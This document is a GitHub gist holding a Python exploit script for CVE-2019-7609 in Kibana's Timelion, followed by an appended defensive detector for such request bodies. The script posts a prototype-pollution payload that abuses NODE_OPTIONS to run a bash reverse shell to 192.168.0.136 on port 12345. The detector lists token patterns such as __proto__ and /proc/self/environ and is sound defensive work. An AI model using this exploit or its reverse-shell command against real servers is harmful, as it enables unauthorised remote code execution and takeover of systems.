@random-robbie
Created June 2, 2020 08:54
CVE-2019-7609
import requests
session = requests.Session()
cmd = "bash -i >& /dev/tcp/192.168.0.136/12345 0>&1"
rawBody = "{\"sheet\":[\".es(*).props(label.__proto__.env.AAAA='require(\\\"child_process\\\").exec(\\\""+cmd+"\\\");process.exit()//')\\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')\"],\"time\":{\"from\":\"now-15m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Europe/London\"}}"
headers = {"Origin":""+KIB_URL+"","Accept":"application/json, text/plain, */*","kbn-version":"6.7.0","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":""+KIB_URL+"/_plugin/kibana/app/timelion","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/json;charset=utf-8"}
response = session.post(""+KIB_URL+"/_plugin/kibana/api/timelion/run", data=rawBody, headers=headers)
print("Status code: %i" % response.status_code)
print("Response body: %s" % response.content)
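
Defensive counterpart, added here and not part of the gist: a detector for request bodies of the shape posted above, intended to be run over captured POST bodies to the Timelion run endpoint (for example from proxy or WAF logs). The function name, the pattern set and the sample bodies are constructed for illustration.

```python
import json
import re

# Tokens that a legitimate Timelion expression has no reason to contain.
# Pattern set is an assumption for this example, not an official signature.
SUSPICIOUS = {
    "prototype-chain access": re.compile(r"__proto__|\bconstructor\s*\.\s*prototype\b"),
    "NODE_OPTIONS assignment": re.compile(r"\bNODE_OPTIONS\b"),
    "env property assignment": re.compile(r"\.env\.\w+\s*="),
    "procfs environ reference": re.compile(r"/proc/self/environ"),
}


def scan_timelion_body(raw_body):
    """Return a sorted list of finding labels for one timelion/run POST body."""
    try:
        doc = json.loads(raw_body)
    except (ValueError, TypeError):
        return ["unparseable body"]
    sheet = doc.get("sheet") if isinstance(doc, dict) else None
    if not isinstance(sheet, list):
        return ["missing sheet array"]
    findings = set()
    for expr in sheet:
        if not isinstance(expr, str):
            findings.add("non-string sheet entry")
            continue
        # Match on the JSON-decoded string so \uXXXX escapes cannot hide tokens.
        for label, pattern in SUSPICIOUS.items():
            if pattern.search(expr):
                findings.add(label)
    return sorted(findings)


# Constructed sample bodies (not captured traffic).
BENIGN = json.dumps({"sheet": [".es(*).label('cpu')"],
                     "time": {"from": "now-15m", "to": "now"}})
# Same token as above, but with the underscores written as JSON \u escapes.
ESCAPED = r'''{"sheet":[".es(*).props(label.\u005f\u005fproto__.env.X='placeholder')"]}'''

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("escaped", ESCAPED)):
        print(name, scan_timelion_body(body))
```

Matching the raw request bytes instead of the decoded `sheet` strings would miss the escaped variant, which is why the scan runs after `json.loads`.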